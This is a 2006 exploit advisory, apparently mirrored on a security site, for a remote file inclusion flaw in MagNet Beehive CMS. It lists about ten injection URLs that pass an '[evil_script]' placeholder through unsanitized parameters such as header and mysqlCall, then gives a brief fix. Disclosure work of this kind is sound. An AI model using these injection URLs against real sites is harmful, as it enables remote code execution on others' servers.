exploits , vulnerabilities , articles , MagNet BeeHive CMS (header) Remote File Include Vulnerability

2007-06-09 e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit
2007-05-22 TutorialCMS <= 1.01 Authentication Bypass Vulnerability
2007-04-16 audioCMS arash 0.1.4 (arashlib_dir) Remote File Inclusion Vulnerabilities
2007-04-14 bloofoxCMS 0.2.2 Cross Site Scripting
2007-04-14 Frogss CMS <= 0.7 Remote SQL Injection Exploit
2007-04-10 SimpCMS Light <= 04.10.2007 (site) Remote File Inclusion Vulnerability

2006-06-25

MagNet BeeHive CMS (header) Remote File Include Vulnerability

Rated as : High Risk

---------------------------------------------------------------------------
Beehive CMS ([header]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Beehive CMS
version : latest version
URL : http://products.magnet-i.com/show/beehive/

------------------------------------------------------------------
Exploit:
~~~~~~~~

Variable $header not sanitized.When register_globals=on an attacker can
exploit this vulnerability with a simple php injection script.


#
http://www.site.com/[path]/conad/include/rootGui.inc.php?header=[evil_script]
#
http://www.site.com/[path]/conad/changeEmail.inc.php?mysqlCall=[evil_script]
#
http://www.site.com/[path]/conad/changeUserDetails.inc.php?mysqlCall=[evil_script]
#
http://www.site.com/[path]/conad/checkPasswd.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/login.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/logout.inc.php?mysqlCall=[evil_script]
#
http://www.site.com/[path]/include/listall.inc.php?mysqlcall=[evil_script]
# http://www.site.com/[path]/show/index.php?prefix=[evil_script]
#
http://www.site.com/[path]/conad/include/mysqlCall.inc.php?config=[evil_script]
# http://www.site.com/[path]/include/rootGui.inc.php?header=[evil_script]

---------------------------------------------------------------------------


Solution :
~~~~~~~~~~

declare variabel $header
---------------------------------------------------------------------------


Shoutz:
~~~~~~

# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and Romanian Security Team [
hTTp://Romania.HackTECK.BE ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~~~
Nick: Kw3rLN
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://Romania.HackTECK.BE & http://www.h4cky0u.org/
/*

-------------------------------- [ EOF]
----------------------------------


securitydot.net - 2006-06-25

Exploits - newest 10 RSS | More

2007-06-15 57230 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34164 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42376 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29310 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19751 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16689 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19385 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16571 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33588 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17213 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit